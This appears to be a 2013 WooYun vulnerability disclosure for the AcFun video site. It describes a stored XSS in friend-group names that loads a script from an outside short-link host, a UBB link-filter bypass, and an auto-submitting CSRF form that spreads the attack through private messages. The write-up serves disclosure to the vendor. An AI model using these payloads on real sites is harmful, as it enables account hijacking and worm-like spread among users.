当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023190

漏洞标题:XSS+CSRF对ACFUN用户持久劫持与自传播,详细分析与突破手段

相关厂商:杭州游趣网络有限公司

漏洞作者: N1ghtBird

提交时间:2013-05-07 09:25

修复时间:2013-06-21 09:26

公开时间:2013-06-21 09:26

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-07: 细节已通知厂商并且等待厂商处理中
2013-05-07: 厂商已经确认,细节仅向厂商公开
2013-05-17: 细节向核心白帽子及相关领域专家公开
2013-05-27: 细节向普通白帽子公开
2013-06-06: 细节向实习白帽子公开
2013-06-21: 细节向公众公开

简要描述:

几个漏洞的综合利用.
感谢@3c0de 提供的思路.

详细说明:

用户中心好友分组位置:

x"x="x


1.png


页面上有长度检测,不过没关系,抓包构造:

2.png


3.png


name=addGroup&groupName=x" onmouseover="var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.src='http://126.am/70Qdp3';h.appendChild(s);" id="xss" style="position: absolute; top: 0px; left: 0px; z-index: 999; padding: 1000px; filter:alpha(opacity=0); -moz-opacity:0;opacity:0;"


效果:

4.png


js内容:

alert('xss script');
$("#xss").remove();


下面是利用自传播:
用户中心里私信功能可以发送链接,链接位置有过滤,只允许链接到acfun.tv域名下:

5.png


但是通过构造UBB可绕过:

[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]


6.png


同时http://www.acfun.tv/api/mail.aspx?name=newMail位置没有来源验证:

<html>
<body>
<form id="csrf" name="csrf" action="http://www.acfun.tv/api/mail.aspx?name=newMail" method="POST">
<input type="hidden" name="userId" value="<?php echo rand(1000,250000);?>" />
<input type="hidden" name="content" value="[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]" />
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>


劫持关注通知传播一条龙...:

7.png

漏洞证明:

8.png

修复方案:

你们比我懂..

版权声明:转载请注明来源 N1ghtBird@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-05-07 16:38

厂商回复:

这次积分应该够了,嘿嘿

最新状态:

暂无